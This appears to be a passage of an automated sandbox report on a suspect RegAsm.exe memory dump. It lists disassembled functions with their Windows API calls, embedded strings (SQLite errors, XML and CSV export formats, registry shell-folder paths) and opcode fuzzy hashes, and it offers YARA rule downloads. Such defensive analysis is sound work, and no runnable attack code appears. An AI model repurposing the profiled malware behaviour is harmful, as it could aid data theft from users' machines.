                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1470729244-0
                                                                                                                                                                                                                      • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                                                                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                      Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1331804452-0
                                                                                                                                                                                                                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                      Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                      Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                      • API String ID: 2521778956-791839006
                                                                                                                                                                                                                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                      Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                      • API String ID: 999028693-502967061
                                                                                                                                                                                                                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                      Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2350177629-0
                                                                                                                                                                                                                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                      Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                      • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                      Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408FB3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00409025
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409042
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 265355444-0
                                                                                                                                                                                                                      • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                      Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4131475296-0
                                                                                                                                                                                                                      • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                      Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                      Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFilefreememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2507021081-0
                                                                                                                                                                                                                      • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                      Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                                                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4131324427-0
                                                                                                                                                                                                                      • Opcode ID: ecbd7776f2dd5681e2983066ac375add8e57fbf4011175ff75c0f11db38a490d
                                                                                                                                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecbd7776f2dd5681e2983066ac375add8e57fbf4011175ff75c0f11db38a490d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                      Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PathTemp$free
                                                                                                                                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                      • API String ID: 924794160-1420421710
                                                                                                                                                                                                                      • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                      Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                      Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                                                                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                      Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                      • API String ID: 0-1953309616
                                                                                                                                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                      Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                      Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
